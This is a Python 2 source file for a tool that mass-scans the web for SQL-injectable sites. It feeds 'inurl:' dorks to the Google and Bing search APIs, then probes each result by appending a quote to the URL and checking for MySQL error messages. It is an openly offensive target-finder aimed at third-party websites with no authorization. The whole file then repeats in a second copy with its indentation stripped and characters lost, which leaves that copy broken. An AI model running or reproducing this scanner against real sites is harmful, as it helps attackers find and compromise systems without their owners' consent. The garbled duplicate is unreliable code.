SiloGit/dorks.py

## dorks.py
"""

***** Auto-finder by dorks tool with Google API & Bing API *****

@author: z0rtecx
@release date: dec-2014
@version: 1.0.12122014
@poc: good dork for find web pages whit SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id="
@description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors.
@features:
	- Find web pages vuln.
@usage:
	- You need a txt file in each line a dork with "inurl:" google command. E.g.

	inurl:event.php?id=
	inurl:product-item.php?id=
	inurl:news_view.php?id=
	...

	- You need Google Search API library: https://developers.google.com/api-client-library/python/apis/customsearch/v1
	- An Google API key: https://www.google.com/cse/manage/all
	- An Bing API key: Microsoft Azure Marketplace, search how get it in google :P

@example:

	$ python dorktool.py

"""


#!/usr/bin/env python

import urllib
import sys
import json
import re
import time
import MySQLdb
import urllib2
from urllib import quote_plus,unquote_plus
from apiclient.discovery import build

# CONSTANTS
############################################################
# Error messages to find in vulnerable web

ERROR_WORDS =  ["Warning", "You have an error in your SQL syntax"]
DORK_OFFSET = 5				# Number of dorks in memory at same time
DORK_ROUND = 0					# Round of dork finding
LAST_DORK = 0					# Last dork byte in the file
PATRON = re.compile('=[0-9]+')  # Regular expresion to find in URLs

# Bing autentification
key = 'YOUR_BING_KEY'
credentials = (':%s' % key).encode('base64')[:-1]
auth = 'Basic %s' % credentials

# Google auth
GOOGLE_KEY = "YOUR_GOOGLE_KEY"
# Buscador de google
GOOGLE_CX = "YOUR_GOOGLE_CX"
############################################################

# Returns the http request from indicated url
def request(url):
	try:
  		req = urllib2.urlopen(urllib2.Request(url)).read()
	except:
		req = ''
  	return req

# Returns True if a url can be vulterable to SQLi. False in other case.
def isVulnerable(url):
	poc = url + '\''
	req = request(url)
	req2 = request(poc)
	if req == req2:
		return False
	else:
		for word in ERROR_WORDS:
			if word not in req and word in req2:
				return True
			else:
				continue
		return False

# Load DORK_OFFSET dorks in memory from 'dorks.txt' file
# Each time this function is called, news dorks are
# returned
def loadDorks(filename):
	global DORK_ROUND # To modify the global variable
	global LAST_DORK
	print 'Loading dorks... '+str(DORK_ROUND)
	DORKS = []
	f = open(filename)
	f.seek(LAST_DORK)
	for i in range(DORK_ROUND*DORK_OFFSET,DORK_ROUND*DORK_OFFSET+DORK_OFFSET):
		DORKS.append(f.readline())
		DORKS[-1]=DORKS[-1][:-1] # Remove dork's carrier return (\n)
	LAST_DORK = f.tell()
	f.close()
	DORK_ROUND+=1
	if DORK_ROUND == 201:
		print "Dorks finished."
		sys.exit()
	return DORKS

# Return a list of URLs, result of Google Dorks search
# Each element of the list is a diccionary which includes:
#	url
#	name of page
#	if vulnerable to SQLi
def googleSearch(dork):
	results = {}
	try:
		service = build("customsearch", "v1", developerKey=GOOGLE_KEY)
		rango = 1
		for i in range(1,6):
			try:
				res = service.cse().list(q=dork,cx=GOOGLE_CX,start=rango,filter='1').execute()
				for i in res[u'items']:
					dic = {
						'url' : i[u'link'],
						'nombre' : i[u'displayLink'],
						'vuln' : '',
						'buscador' : 'Google',
						'fecha_indexacion' : time.strftime("%Y-%m-%d"),
					}
					# If vulnerable
					if isVulnerable(dic['url']):
						dic['vuln'] = "[*]"
						results[dic['nombre']] = dic
					rango += 1
			except:
				return results
		print "Next Dork\n"
	except:
		return results
	return results

# Return a list of URLs find using Bing Dorks
def bingSearch(dork):
	results = {}
	url = 'https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=%27' + quote_plus(dork) + '%27&$format=json'
	request = urllib2.Request(url)
	request.add_header('Authorization', auth)
	request_opener = urllib2.build_opener()
	response = request_opener.open(request)
	response_data = response.read()
	json_result = json.loads(response_data)
	lista = json_result['d']['results']
	for i in lista:
		url2 = 'http://'+str(i['DisplayUrl'].encode('ascii', 'ignore'))
		name = re.findall("((http\://|https\://|ftp\://)|(www.))+(([a-zA-Z0-9\.-]+\.[a-zA-Z]{2,4})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(/[a-zA-Z0-9%:/-_\?\.'~]*)?", url2)
		dic = {
			'url'  : url2, # Extract the url
			'nombre' : name[0][3], # Extract the name
			'vuln' : '',
			'buscador' : 'Bing',
			'fecha_indexacion' : time.strftime("%Y-%m-%d"),
		}
		# If vulnerable
		if isVulnerable(url2):
			dic['vuln'] = '[*]'
			results[dic['nombre']] = dic
		else:
			continue
	return results

# Format the URLs for the screen output
def printResults(dork, results):
	i = 1
	for k, v in results.iteritems():
		print '\n------------------------------------'
		print '['+str(i)+'/'+str(len(results))+' from '+dork+']'
		print 'WEB NAME: %s' % v['nombre']
		print 'URL: %s' % v['url']
		print 'VULN: %s' % v['vuln']
		print 'SEARCH ENGINE: %s' % v['buscador']
		print 'DATE: %s' % v['fecha_indexacion']
		print '------------------------------------'
		i+=1
		sys.stdout.flush()


###############
# MAIN FUNCTION
###############

if __name__ == "__main__":
	while True:
		dorks = loadDorks('dorks.txt') # Load the first 30 dorks
		# For each dork, get all the urls of the search and try if vulnerable
		for d in dorks:
			google = googleSearch(d)
			bing = bingSearch(d)
			if len(google)!=0:
				printResults(d, google)
			else:
				print "No Google results found."
			if len(bing)!=0:
				printResults(d, bing)
			else:
				print "No Bing results found."
	"""

	*** Auto-finder by dorks tool with Google API & Bing API ***

	@author: z0rtecx
	@release date: dec-2014
	@version: 1.0.12122014
	@poc: good dork for find web pages whit SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id="
	@description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors.
	@features:
	- Find web pages vuln.
	@usage:
	- You need a txt file in each line a dork with "inurl:" google command. E.g.

	inurl:event.php?id=
	inurl:product-item.php?id=
	inurl:news_view.php?id=
	...

	- You need Google Search API library: https://developers.google.com/api-client-library/python/apis/customsearch/v1
	- An Google API key: https://www.google.com/cse/manage/all
	- An Bing API key: Microsoft Azure Marketplace, search how get it in google :P

	@example:

	$ python dorktool.py

	"""


	#!/usr/bin/env python

	import urllib
	import sys
	import json
	import re
	import time
	import MySQLdb
	import urllib2
	from urllib import quote_plus,unquote_plus
	from apiclient.discovery import build

	# CONSTANTS
	############################################################
	# Error messages to find in vulnerable web

	ERROR_WORDS = ["Warning", "You have an error in your SQL syntax"]
	DORK_OFFSET = 5 # Number of dorks in memory at same time
	DORK_ROUND = 0 # Round of dork finding
	LAST_DORK = 0 # Last dork byte in the file
	PATRON = re.compile('=[0-9]+') # Regular expresion to find in URLs

	# Bing autentification
	key = 'YOUR_BING_KEY'
	credentials = (':%s' % key).encode('base64')[:-1]
	auth = 'Basic %s' % credentials

	# Google auth
	GOOGLE_KEY = "YOUR_GOOGLE_KEY"
	# Buscador de google
	GOOGLE_CX = "YOUR_GOOGLE_CX"
	############################################################

	# Returns the http request from indicated url
	def request(url):
	try:
	req = urllib2.urlopen(urllib2.Request(url)).read()
	except:
	req = ''
	return req

	# Returns True if a url can be vulterable to SQLi. False in other case.
	def isVulnerable(url):
	poc = url + '\''
	req = request(url)
	req2 = request(poc)
	if req == req2:
	return False
	else:
	for word in ERROR_WORDS:
	if word not in req and word in req2:
	return True
	else:
	continue
	return False

	# Load DORK_OFFSET dorks in memory from 'dorks.txt' file
	# Each time this function is called, news dorks are
	# returned
	def loadDorks(filename):
	global DORK_ROUND # To modify the global variable
	global LAST_DORK
	print 'Loading dorks... '+str(DORK_ROUND)
	DORKS = []
	f = open(filename)
	f.seek(LAST_DORK)
	for i in range(DORK_ROUNDDORK_OFFSET,DORK_ROUNDDORK_OFFSET+DORK_OFFSET):
	DORKS.append(f.readline())
	DORKS[-1]=DORKS[-1][:-1] # Remove dork's carrier return (\n)
	LAST_DORK = f.tell()
	f.close()
	DORK_ROUND+=1
	if DORK_ROUND == 201:
	print "Dorks finished."
	sys.exit()
	return DORKS

	# Return a list of URLs, result of Google Dorks search
	# Each element of the list is a diccionary which includes:
	# url
	# name of page
	# if vulnerable to SQLi
	def googleSearch(dork):
	results = {}
	try:
	service = build("customsearch", "v1", developerKey=GOOGLE_KEY)
	rango = 1
	for i in range(1,6):
	try:
	res = service.cse().list(q=dork,cx=GOOGLE_CX,start=rango,filter='1').execute()
	for i in res[u'items']:
	dic = {
	'url' : i[u'link'],
	'nombre' : i[u'displayLink'],
	'vuln' : '',
	'buscador' : 'Google',
	'fecha_indexacion' : time.strftime("%Y-%m-%d"),
	}
	# If vulnerable
	if isVulnerable(dic['url']):
	dic['vuln'] = "[*]"
	results[dic['nombre']] = dic
	rango += 1
	except:
	return results
	print "Next Dork\n"
	except:
	return results
	return results

	# Return a list of URLs find using Bing Dorks
	def bingSearch(dork):
	results = {}
	url = 'https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=%27' + quote_plus(dork) + '%27&$format=json'
	request = urllib2.Request(url)
	request.add_header('Authorization', auth)
	request_opener = urllib2.build_opener()
	response = request_opener.open(request)
	response_data = response.read()
	json_result = json.loads(response_data)
	lista = json_result['d']['results']
	for i in lista:
	url2 = 'http://'+str(i['DisplayUrl'].encode('ascii', 'ignore'))
	name = re.findall("((http\://\|https\://\|ftp\://)\|(www.))+(([a-zA-Z0-9\.-]+\.[a-zA-Z]{2,4})\|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(/[a-zA-Z0-9%:/-_\?\.'~]*)?", url2)
	dic = {
	'url' : url2, # Extract the url
	'nombre' : name[0][3], # Extract the name
	'vuln' : '',
	'buscador' : 'Bing',
	'fecha_indexacion' : time.strftime("%Y-%m-%d"),
	}
	# If vulnerable
	if isVulnerable(url2):
	dic['vuln'] = '[*]'
	results[dic['nombre']] = dic
	else:
	continue
	return results

	# Format the URLs for the screen output
	def printResults(dork, results):
	i = 1
	for k, v in results.iteritems():
	print '\n------------------------------------'
	print '['+str(i)+'/'+str(len(results))+' from '+dork+']'
	print 'WEB NAME: %s' % v['nombre']
	print 'URL: %s' % v['url']
	print 'VULN: %s' % v['vuln']
	print 'SEARCH ENGINE: %s' % v['buscador']
	print 'DATE: %s' % v['fecha_indexacion']
	print '------------------------------------'
	i+=1
	sys.stdout.flush()


	###############
	# MAIN FUNCTION
	###############

	if __name__ == "__main__":
	while True:
	dorks = loadDorks('dorks.txt') # Load the first 30 dorks
	# For each dork, get all the urls of the search and try if vulnerable
	for d in dorks:
	google = googleSearch(d)
	bing = bingSearch(d)
	if len(google)!=0:
	printResults(d, google)
	else:
	print "No Google results found."
	if len(bing)!=0:
	printResults(d, bing)
	else:
	print "No Bing results found."